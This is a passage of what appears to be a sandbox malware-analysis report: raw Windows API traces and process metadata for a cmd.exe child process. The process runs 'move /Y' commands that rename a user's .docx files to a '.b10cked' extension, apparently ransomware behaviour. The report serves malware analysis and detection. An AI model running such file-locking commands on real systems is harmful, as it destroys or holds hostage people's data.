lpLCData="Wed") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 
lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.371] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.372] GetConsoleTitleW (in: lpConsoleTitle=0xb08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.385] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.385] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.385] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.385] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.385] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.385] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.385] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.387] GetConsoleTitleW (in: lpConsoleTitle=0x2cf400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.422] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.422] 
_wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.422] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.422] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.422] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.422] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf1bc, nVolumeNameSize=0x104, 
lpVolumeSerialNumber=0x2cf1b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf1b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned 
-13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.425] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.425] _wcsicmp (_String1="8RVD3E~1.DOC", _String2=".") returned 10 [0136.425] _wcsicmp (_String1="8RVD3E~1.DOC", _String2="..") returned 10 [0136.425] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3e~1.doc")) returned 0x20 [0136.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.425] SetErrorMode (uMode=0x0) returned 0x0 [0136.425] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", nBufferLength=0x104, lpBuffer=0x2ceb44, lpFilePart=0x2ceb2c | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", lpFilePart=0x2ceb2c*="8RVD3E~1.DOC") returned 0x26 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.426] _wcsicmp (_String1="8RVD3E~1.DOC", _String2=".") returned 10 [0136.426] _wcsicmp (_String1="8RVD3E~1.DOC", _String2="..") returned 10 [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3e~1.doc")) returned 0x20 [0136.426] SetErrorMode (uMode=0x0) returned 0x0 [0136.426] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", nBufferLength=0x104, lpBuffer=0x2cefc0, lpFilePart=0x2ced58 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", lpFilePart=0x2ced58*="8RVD3E~1.DOC") returned 0x26 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] SetErrorMode (uMode=0x0) returned 0x0 [0136.426] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf1c8, lpFilePart=0x2ced58 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", lpFilePart=0x2ced58*="8rVd3erYRX.docx.b10cked") returned 0x31 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] SetLastError (dwErrCode=0x0) [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx.b10cked")) returned 0xffffffff [0136.426] GetLastError () returned 0x2 [0136.426] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x2ce6d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce6d4) returned 0xb0f08 [0136.427] FindNextFileW (in: 
hFindFile=0xb0f08, lpFindFileData=0x2ce6d4 | out: lpFindFileData=0x2ce6d4) returned 0 [0136.427] GetLastError () returned 0x12 [0136.427] FindClose (in: hFindFile=0xb0f08 | out: hFindFile=0xb0f08) returned 1 [0136.428] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", fInfoLevelId=0x1, lpFindFileData=0xc1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc1ae0) returned 0xb0f08 [0136.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2ce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", lpFilePart=0x0) returned 0x31 [0136.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx", nBufferLength=0x104, lpBuffer=0x2ce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx", lpFilePart=0x0) returned 0x29 [0136.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx")) returned 0x20 [0136.428] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx.b10cked"), dwFlags=0x3) returned 1 [0136.430] FindClose (in: hFindFile=0xb0f08 | out: hFindFile=0xb0f08) returned 1 [0136.430] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce920 | out: _Buffer=" 1") returned 9 [0136.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.430] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce8ac | out: lpMode=0x2ce8ac) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] 
GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce8e0 | out: lpConsoleScreenBufferInfo=0x2ce8e0) returned 1 [0136.463] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.463] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce920 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.463] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce904, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce904*=0x1a) returned 1 [0136.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.484] exit (_Code=0) Process: id = "137" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13615 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13616 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13617 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13618 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13619 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13620 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13621 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13622 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13623 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" 
Region: id = 13624 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13955 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13956 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13957 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13958 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13959 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 13960 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13961 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13962 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13963 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13964 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13965 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13966 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13967 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13968 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13969 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 13970 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13971 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13972 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13973 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13974 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000e0000" filename = "" Region: id = 13975 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13976 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13977 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 13978 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 194 os_tid = 0xbcc [0135.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fab4 | out: lpSystemTimeAsFileTime=0x30fab4*(dwLowDateTime=0x8afa86c0, dwHighDateTime=0x1d440a9)) [0135.970] GetCurrentProcessId () returned 0xbd0 [0135.970] GetCurrentThreadId () returned 0xbcc [0135.970] GetTickCount () returned 0x2b00c [0135.970] QueryPerformanceCounter (in: lpPerformanceCount=0x30faac | out: lpPerformanceCount=0x30faac*=19275935895) returned 1 [0135.971] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.971] __set_app_type (_Type=0x1) [0135.971] __p__fmode () returned 0x76b331f4 [0135.971] __p__commode () returned 0x76b331fc [0135.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.971] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.971] GetCurrentThreadId () returned 0xbcc [0135.971] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbcc) returned 0x38 [0135.971] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.971] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.971] SetThreadUILanguage (LangId=0x0) returned 0x409 
[0135.971] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.971] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa44 | out: phkResult=0x30fa44*=0x0) returned 0x2 [0135.972] VirtualQuery (in: lpAddress=0x30fa7b, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.972] GetConsoleOutputCP () returned 0x1b5 [0135.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.972] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0135.972] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.973] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.973] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.973] GetEnvironmentStringsW () returned 0x100168* [0135.973] FreeEnvironmentStringsW (penv=0x100168) returned 1 [0135.973] GetEnvironmentStringsW () returned 0x100168* [0135.973] FreeEnvironmentStringsW (penv=0x100168) returned 1 [0135.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9b4 | out: phkResult=0x30e9b4*=0x40) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x90, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x0, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, 
